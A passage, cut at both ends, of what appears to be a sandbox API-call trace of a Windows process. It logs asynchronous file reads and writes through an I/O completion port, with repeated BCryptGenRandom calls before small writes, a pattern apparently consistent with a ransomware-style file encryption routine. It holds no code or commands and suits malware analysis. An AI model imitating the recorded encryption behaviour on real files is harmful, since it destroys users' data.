out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0146.794] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0146.804] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x7850, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0146.805] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0146.815] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x9658, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0146.816] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0146.826] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x3c58, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0146.827] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0146.837] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x4238, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0146.837] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0146.847] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x4464, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0146.847] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0146.860] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x85d0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0146.861] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0146.870] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x31d0, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0146.878] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0146.889] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1d08, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0146.890] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0146.891] CloseHandle (hObject=0x3cc) returned 1 [0146.891] free (_Block=0x3df0008) [0146.891] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0146.899] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.900] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.900] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0146.900] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0146.900] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0146.900] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0146.901] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0146.901] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0146.901] free (_Block=0x3e305b8) [0146.901] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0146.901] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0146.901] free (_Block=0x1fa91d0) [0146.901] free (_Block=0x1fa2ed8) [0146.901] free (_Block=0x1fa90b8) [0146.901] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0146.902] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0146.903] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x30f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0146.903] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0146.972] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0xb670, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0146.973] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0146.987] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x45f8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0146.997] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0147.005] ReadFile (in: hFile=0x170, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x48dc, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0147.011] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0147.189] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x51b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0147.190] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0147.198] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.198] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.198] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0147.198] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.199] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.199] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0147.199] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.199] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0147.199] free (_Block=0x3e305b8) [0147.199] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0147.199] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0147.200] free (_Block=0x1fa91d0) [0147.200] free (_Block=0x1fa2ed8) [0147.200] free (_Block=0x1fa90b8) [0147.200] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0147.200] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0147.212] CloseHandle (hObject=0x2a8) returned 1 [0147.212] free (_Block=0x1ff1e60) [0147.212] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0147.219] CloseHandle (hObject=0x2a4) returned 1 [0147.220] free (_Block=0x3d70450) [0147.220] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0147.231] CloseHandle (hObject=0x3cc) returned 1 [0147.231] free (_Block=0x3e70008) [0147.231] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0147.244] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x1b80, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0147.244] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0147.255] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x16e8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0147.258] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0147.371] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x13f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0147.371] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0147.379] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.380] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.380] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0147.380] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.380] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.380] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0147.380] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.381] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0147.381] free (_Block=0x3e305b8) [0147.381] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0147.381] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0147.381] free (_Block=0x1fa91d0) [0147.381] free (_Block=0x1fa2ed8) [0147.381] free (_Block=0x1fa90b8) [0147.381] WriteFile (in: hFile=0x170, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0147.381] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0147.393] CloseHandle (hObject=0x2a4) returned 1 [0147.393] free (_Block=0x1ff1e60) [0147.393] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0147.399] WriteFile (in: hFile=0x170, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x38e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0147.399] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0147.410] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.411] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0147.411] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.411] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.411] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0147.412] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.412] calloc (_Count=0x41, _Size=0x4) returned 0x1fa92e8 [0147.412] free (_Block=0x3e305b8) [0147.412] calloc (_Count=0x41, _Size=0x4) returned 0x1fa9400 [0147.412] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0147.412] free (_Block=0x1fa9400) [0147.412] free (_Block=0x77d7a8) [0147.412] free (_Block=0x1fa92e8) [0147.412] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0147.413] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0147.423] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.424] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.424] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0147.424] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.424] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.425] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0147.425] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.425] calloc (_Count=0x41, _Size=0x4) returned 0x1fa92e8 [0147.425] free (_Block=0x3e305b8) [0147.425] calloc (_Count=0x41, _Size=0x4) returned 0x1fa9400 [0147.425] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0147.425] free (_Block=0x1fa9400) [0147.425] free (_Block=0x77d7a8) [0147.425] free (_Block=0x1fa92e8) [0147.425] WriteFile (in: hFile=0xec, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0147.426] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0147.467] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.469] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.469] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0147.469] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.470] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.470] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0147.470] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.470] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0147.470] free (_Block=0x3e305b8) [0147.470] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0147.470] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0147.471] free (_Block=0x1fa91d0) [0147.471] free (_Block=0x1fa2ed8) [0147.471] free (_Block=0x1fa90b8) [0147.471] WriteFile (in: hFile=0x170, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0147.471] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0147.472] WriteFile (in: hFile=0x170, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x7220, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0147.473] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0147.483] ReadFile (in: hFile=0x338, lpBuffer=0x3fb00ec, nNumberOfBytesToRead=0x5de2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3fb00b8 | out: lpBuffer=0x3fb00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3fb00b8) returned 1 [0147.487] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0147.488] CloseHandle (hObject=0x338) returned 1 [0147.488] free (_Block=0x3fb00b8) [0147.488] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0147.508] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.508] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.508] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0147.508] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.509] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.509] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0147.509] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.509] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0147.509] free (_Block=0x3e305b8) [0147.509] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0147.509] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0147.510] free (_Block=0x1fa91d0) [0147.510] free (_Block=0x1fa2ed8) [0147.510] free (_Block=0x1fa90b8) [0147.510] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0147.510] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0147.517] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.518] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.518] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0147.518] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.519] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.519] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0147.519] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.519] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0147.519] free (_Block=0x3e305b8) [0147.519] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0147.519] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0147.537] free (_Block=0x1fa91d0) [0147.537] free (_Block=0x1fa2ed8) [0147.537] free (_Block=0x1fa90b8) [0147.537] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0147.537] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0147.553] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x5b30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0147.553] GetQueuedCompletionStatus (in: 